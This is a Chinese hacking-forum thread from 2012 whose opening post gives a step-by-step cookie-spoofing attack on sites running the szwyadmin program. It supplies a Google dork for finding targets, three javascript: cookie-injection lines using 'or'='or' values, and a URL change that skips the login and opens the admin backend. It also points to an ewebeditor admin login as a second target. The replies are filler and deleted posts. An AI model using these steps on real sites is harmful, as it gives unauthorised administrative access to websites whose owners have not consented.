szwyadmin程序cookies欺骗漏洞拿shell

admin · 发表于 2012-9-30 06:25:11

首先我们在Google中搜索关键词关键字:inurl:szwyadmin/login.asp

任意打开一个搜索结果，打开登录界面后在地址栏中输入下面的代码：
代码：

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
关闭此页面

在次打开登录界面，在地址栏中将login.asp改为admin_index.asp，就直接进入后台了

另外还可以试试，ewebeditor/admin_login.asp
[/td][/tr]
[/table]

刘杰以死 · 发表于 2012-9-30 16:32:36

提示: 作者被禁止或删除内容自动屏蔽

神翼虎 · 发表于 2012-10-2 05:13:02

床前明月光，低头吃便当！

论坛大神 · 发表于 2012-10-6 15:46:51

看贴回复是好习惯

萨斐罗斯 · 发表于 2012-10-8 07:49:35

这样的贴子，不顶说不过去啊

显示全部楼层 · 发表于 2012-10-9 04:37:15

提示: 作者被禁止或删除内容自动屏蔽

柱哥仔 · 发表于 2014-12-26 15:35:24

(*^__^*) 嘻嘻……

厉少云 · 发表于 2015-1-26 21:58:30

挤在北京，给首都添麻烦了……

叫哥哥 · 发表于 2015-1-30 16:00:26

(*^__^*) 嘻嘻……

麒麟兽 · 发表于 2015-3-4 05:35:23

我假装认真地工作，老板假装认真地付薪水

刘杰以死刘杰以死当前离线积分 227 窥视卡雷达卡	发表于 2012-9-30 16:32:36 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
刘杰以死刘杰以死当前离线积分 227 窥视卡雷达卡
	回复支持反对使用道具举报显身卡

408226286 该用户已被删除	发表于 2012-10-9 04:37:15 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
408226286 该用户已被删除
	回复支持反对使用道具举报显身卡

szwyadmin程序cookies欺骗漏洞拿shell

相关帖子